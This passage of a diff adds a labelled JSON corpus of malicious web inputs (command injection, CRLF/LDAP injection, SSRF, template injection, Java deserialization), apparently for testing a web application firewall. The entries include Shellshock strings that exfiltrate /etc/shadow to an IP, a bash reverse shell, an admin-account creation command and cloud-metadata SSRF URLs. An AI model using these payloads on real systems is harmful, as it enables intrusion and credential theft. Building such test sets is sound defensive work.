+  "kind": "mal",
+  "payload": "&& dir"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "() { :;}; /bin/bash -c \"curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\\`grep root /etc/shadow\\`\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "TEST=echo | gcc7.4"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "code=chef-vault -i secret"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "|| perl -e 'print \"X\"x4096'"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "arg=Something+%26%238222%3BThe+Title%26%238221%3B.+After+something+()%20{%20:;};%20/bin/bash%20-c%20\"ftp%20http://135.23.158.130/.testing/shellshock.txt?vuln=22?dig=\\`top%20-a\\`\""
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "& ls -laR /etc"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "' & whoami"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "FOR+%2FF+%25%25G+IN+%28%27%22C%3A%5Cprogram+Files%5Ccommand.exe%22%27%29+DO+ECHO+%25%25G"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "&& ls -l /"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "&& net localgroup Administrators hacker /ADD"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "code=pip3 install something"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "& ls -l /tmp"
+ },
+ {
+  "category": "cmdi",
+  "kind": "mal",
+  "payload": "%3B%24a%20cat%20%24a%20%24at%20test.txt"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%250aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foo=eb9adbd87d)!(sn=*"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foobar%0d%0aContent-Length:%2002343432423<html>ftw</html>"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "test)%09(%09|"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%23%0d%0aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "test%0Dnext=more"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "%0d%0aRemote-addr%0d%0d%0d:%20foo.bar.com"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "unix:AAAAAAAAA|http://coreruleset.org/"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%0dSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "test)%20(%20%26%20"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "<evil>"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "%0d%0Remote-addr%0d%0d%0d:%20foo.bar.com"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foo=void)(objectClass=users))(%26(objectClass=void)"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "unix%3AAAAAAAAAA|http://coreruleset.org/"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "test))(%26(objectClass%3D*"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%23%0aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%%0a0aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "barGET /a.html HTTP/1.1\r\nSomething: GET /b.html HTTP/1.1\r\nHost: foo.com\r\nUser-Agent: foo\r\nAccept: */*"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "var=aaa%0dHEAD+http://example.com/+HTTP/1.1"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%3f%0d%0aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "var=%0aPOST / HTTP/1.1"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%2F..%0d%0aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%0aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "val)%26(cn%3Dadmin"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "test%0Anext=more"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "val)%7C(uid%3D*"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "test%0A%0Dnext=more"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foo=aaa*aaa)(cn>=bob)"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "%0d%0aRemote-addr:%20foo.bar.com"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%u000aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%25250aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "var=%0d%0aContent-Length: 0"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "john)(sn~%3Dsmith"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "%0d%0restofdata"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "admin)(|"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foo=*)(uid=*))(|(uid=*"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%0d%0aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%3f%0dSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%25%30%61Set-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foo=bar)(%26)"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "var=aaa%0aGET+/+HTTP/1.1"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "username=admin)(%26(objectClass%3D*)&password=anything"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foo=printer)(uid=*)"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "foo=*)!(sn=*"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "%0d%0arefresh:%20www.bar.com"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "admin)(%7C(password%3D*"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%25%30aSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "/%23%0dSet-Cookie:crlf=injection"
+ },
+ {
+  "category": "crlf",
+  "kind": "mal",
+  "payload": "value)(gidNumber%3C%3D100"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "{\"user__profile__city__startswith\":\"p\"}"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "url=localhost%2F"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "eval%28String.fromCharCode"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A127.0.0.1"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "host.docker.internal/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "require(\"child_process\").exec('whoami')"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "ipv6-localhost/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(Infinity);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://[fe80::%zone1]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "{\"created_by__departments__employees__user__username__startswith\":\"p\",\"created_by__departments__employees__user__id\":1}"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bkeys%20%25ENV%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bsystem%20%27bash%20-c%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.0.1%2F4242%200%3E%261%27%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "function%28%29+%7B"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5B%20do%20%7B%20system%20%27id%27%20%7D%20%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%7b%7b7*7%7d%7d"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A%2F%2F169.254.169.254%2Fmetadata%2Fv1.json"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://[0:0:0:0:0:ffff:a9fe:a9fe]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bsystem%20%27cat%20%2Fetc%2Fpasswd%20%7C%20grep%20root%20%7C%20cut%20-d%3A%20-f1%27%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5B%20%26system%20%27id%27%20%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!!{});"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%23%7bruntime.exec(%27id%27)%7d"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "gopher://0x7f000001"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(true);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://\\\\g\\\\o\\\\o\\\\g\\\\l\\\\e.\\\\c\\\\o\\\\m/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "kubernetes.docker.internal/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "{\"roles__contained_by\":[\"admin\",\"user\"]}"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A%2F%2Flocalhost%2F"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://[a::]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!NaN)"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "Process.spawn(%22id%22)"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5B%20%28system%20%27id%27%29%20%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "----------397236876\nContent-Disposition: form-data; name=\"file\"; filename=\"http://2852039166/?.txt\"\nContent-Type: text/plain\n\nMy epic SSRF attempt\n\n----------397236876--"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bsystem%20%27who%5Cami%27%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%7b%25%20%69%66%20%54%72%75%65%20%25%7d%34%39%7b%25%20%65%6e%64%69%66%20%25%7d"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!``);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(-1);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bsystem%20%27id%27%20%23cmt%0A%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "{\"username__startswith\":\"p\"}"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A0xA9FEA9FE"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%23%7Bprocess.binding%28foo%29.spawn%28foo2%29%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!false)"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "rsync://[0:0:0:0:0:ffff:169.254.169.254]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!!``);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "require%5Breq.query.a"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!'');"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!!\"\");"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "localhost4/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(new%20Date);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://[dead:beef:dead::beef:dead:beef:dead]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://[::]/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "https%3A%2F%2Fmetadata.packet.net%2Fuserdata"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%3c%25%3d7*7%25%3e"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5B%60whoami%60%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(-Infinity);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!\"\");"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Brand%20100%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bexec%20%27whoami%27%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "process[\"env\"]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A0251.0376.0251.0376"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%3c%25%3d%20%69%66%20%54%72%75%65%20%25%3e%34%39%3c%25%20%65%6e%64%69%66%20%25%3e"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!undefined)"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "process.env"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!0);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A%2F%2F192.0.0.192%2Flatest%2Fuser-data%2F"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bopen%20F%2C%27%7Cls%27%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "lvh.me/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5B%20system%20%28%27who%27.%27ami%27%29%20%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "example.com"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A%2F%2F169.254.169.254%2FcomputeMetadata%2Fv1%2F"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://169。254。169。254/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "data:text/plain;base64,SSBsb3ZlIFBIUAo="
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "process%5Breq.query.a"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://[0:0:0:0:0:0:169.254.169.254]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%20%20%20%20%5B%20%20%20%20system%20%20%20%20%22id%22%20%20%20%20%5D%20%20%20%20%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "localtest.me/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "{\"password__isnull\":true}"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://\\\\l\\\\o\\\\c\\\\a\\\\l\\\\h\\\\o\\\\s\\\\t/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "constructor%5Bprototype%5D%5Btest%5D%3Dtest"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bopen%20F%2C%27%2Fetc%2Fpasswd%27%3B%40a%3D%3CF%3E%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "_%24%24ND_FUNC%24%24_"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bsort%20%7B%20%24a%20%3C%3D%3E%20%24b%20%7D%20%283%2C2%2C1%29%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bsystem%20%27id%27%5D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(%2B1);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%23%7Brequire.main.constructor._load%28child_process%29.spawn%28%27foo%27%2C%5B%27bar%27%2C%27bar%27%5D%29%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "host.containers.internal/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "{\"created_by__departments__employees__user__username__startswith\":\"p\"}"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%23%7Brequire.main.constructor._load%28%27child_process%27%29.fork%28%22binary%22%2C%20%5B%22bar%22%5D%2C%20%7B%7D%29%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bsystem%20%27whoam%27%27%27%27i%27%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://[0:0:0:0:0:ffff:169.254.169.254]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://[fe80::dead:beef:dead:beef:dead:beef%zone1]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!![]);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A%2F2852039166"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "ip6-loopback/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%40%7B%5BCORE%3A%3Atime%28%29%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "__proto__%5Bv-bind%3Aclass%5D%3D%27%27.constructor.constructor%28%27alert%281%29%27%29%28%29"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%23%7Brequire.main.constructor._load%28foo%29.readdirSync%28foo2%29%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!!'');"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Btest%5D%5Btest2%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "param=%40%7B%5Bsystem%20%27id%27%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A[::ffff:a9fe:a9fe]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "module.exports%3D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "kubernetes.default.svc.cluster.local/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(!null)"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%40%40%40%7B%5BCORE%3A%3Atime%28%29%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "rtmp://017700000001"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(this);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://[::ffff:a9fe:a9fe]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "local_file://2852039166/"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bsystem%20%27id%27%5Dextra"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "console.info(1)"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "c%5Cu006fnsole.info(1)"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A%2F%2F169.254.169.254%2Fopenstack"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%20%20%20%5B%20%20%20uc%20%20%20%27hello%27%20%20%20%5D%20%20%20%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "XyQkTkRfRlVOQyQkXwo="
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "c\\u006fnsole.info(1)"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http://[a::b]"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%23%7b7*7%7d"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "while(String);"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A123456789"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Bgetpwuid%28%24%3E%29%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5Beval%7Bsystem%20%27id%27%7D%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "%40%7B%5B%20CORE%3A%3Asystem%20%27id%27%20%5D%7D"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "console[\"info\"](1)"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "http%3A2852039166"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "data:text/plain"
+ },
+ {
+  "category": "generic",
+  "kind": "mal",
+  "payload": "console.info.call(this,1)"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.lang.Process"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.io.CharArrayReader\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.evil.processbuilder"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "ProcessBuilder.evil.forclosure=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">B3aGlsZWNsb3N1cmU</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"java.lang.Number\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.reflect</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "-----------------------------thisissparta\nContent-Disposition: form-data; name=\"payload\"\nContent-Type: application/json\n\n{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}\n-----------------------------thisissparta--"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "test=java.io.PrintStream"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"ProcessBuilder.evil.prototypeclonefactory\">element_value</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.lang.String\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">java.lang.Object</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.io.InputStreamReader\">element_value</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">java.lang.StringBuilder</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"java.io.ByteArrayInputStream\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Bmb3JjbG9zdXJl</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Gluc3RhbnRpYXRlZmFjdG9yeQ</element></l3></l2></l1></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "java.io.ByteArrayOutputStream=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"org.apache.commons\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"KztAAU\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"java.lang.Runtime\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"java.lang.Process\">element_value</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"HJ1bnRpbWU\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"HByb2Nlc3NidWlsZGVy\">element_value</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "GNsb25ldHJhbnNmb3JtZXI=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.lang.Object\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"java.io.FilterInputStream\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "<?xml version=\"1.0\"?><xml><element attribute_name=\"HdoaWxlY2xvc3VyZQ\">element_value</element></xml>"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"Zm9yY2xvc3VyZQ\": \"test\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.io.InputStream\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "{\"test\": \"java.lang.Runtime\"}"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
+  "payload": "java.io.InputStreamReader=test"
+ },
+ {
+  "category": "java",
+  "kind": "mal",
